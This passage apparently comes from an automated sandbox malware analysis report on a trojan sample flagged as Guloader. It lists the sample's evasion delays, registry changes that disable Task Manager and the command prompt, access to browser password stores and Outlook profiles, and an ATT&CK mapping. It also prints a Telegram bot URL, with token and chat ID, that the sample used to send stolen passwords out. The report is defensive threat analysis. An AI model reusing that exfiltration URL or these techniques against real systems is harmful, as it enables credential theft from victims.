            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 5844Thread sleep count: 1683 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 5844Thread sleep count: 8167 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598561s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -596063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exe TID: 3212Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_00405846
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 5_2_00406398 FindFirstFileW,FindClose,5_2_00406398
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598561Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 596063Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeThread delayed: delay time: 594500Jump to behavior
            Source: ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ppISxhDcpF.exe, 00000005.00000002.2713551254.0000000005098000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8e
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeAPI call chain: ExitProcess graph end nodegraph_0-3749
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeAPI call chain: ExitProcess graph end nodegraph_0-3931
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00403C41 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,LdrInitializeThunk,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,LdrInitializeThunk,SendMessageW,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,LdrInitializeThunk,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,LdrInitializeThunk,ShowWindow,DestroyWindow,EndDialog,ShowWindow,0_2_00403C41
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeProcess created: C:\Users\user\Desktop\ppISxhDcpF.exe "C:\Users\user\Desktop\ppISxhDcpF.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeQueries volume information: C:\Users\user\Desktop\ppISxhDcpF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeCode function: 0_2_00406077 GetVersion,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ppISxhDcpF.exe PID: 4932, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ppISxhDcpF.exe PID: 4932, type: MEMORYSTR
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ppISxhDcpF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ppISxhDcpF.exe PID: 4932, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ppISxhDcpF.exe PID: 4932, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ppISxhDcpF.exe PID: 4932, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            ppISxhDcpF.exe58%ReversingLabsWin32.Trojan.Guloader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://drive.google.coml0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.23.110
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.225
              truefalse
                high
                reallyfreegeoip.org
                104.21.96.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035934000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035A55000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botppISxhDcpF.exe, 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.com/EppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2153669681.0000000005106000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://reallyfreegeoip.orgppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035768000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.orgppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035750000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://checkip.dyndns.org/0(ppISxhDcpF.exe, 00000005.00000002.2736621144.0000000037F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/ppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/:ppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2713551254.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2153669681.0000000005106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.google.com/kppISxhDcpF.exe, 00000005.00000002.2713551254.0000000005098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://drive.google.comlppISxhDcpF.exe, 00000005.00000003.2153544676.0000000005101000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://apis.google.comppISxhDcpF.exe, 00000005.00000003.2110466882.0000000005109000.00000004.00000020.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000003.2111342336.0000000005109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.comppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035934000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035750000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035A55000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorppISxhDcpF.exefalse
                                                              high
                                                              http://api.telegram.orgppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035934000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035A55000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, ppISxhDcpF.exe, 00000005.00000002.2734788636.00000000358DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameppISxhDcpF.exe, 00000005.00000002.2734788636.00000000356D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.google.com/cppISxhDcpF.exe, 00000005.00000002.2713551254.0000000005098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/ppISxhDcpF.exe, 00000005.00000002.2734788636.0000000035750000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      172.217.23.110
                                                                      drive.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      132.226.8.169
                                                                      checkip.dyndns.comUnited States
                                                                      16989UTMEMUSfalse
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse
                                                                      142.250.181.225
                                                                      drive.usercontent.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.21.96.1
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1587988
                                                                      Start date and time:2025-01-10 20:07:53 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 40s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:8
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:ppISxhDcpF.exe
                                                                      renamed because original name is a hash value
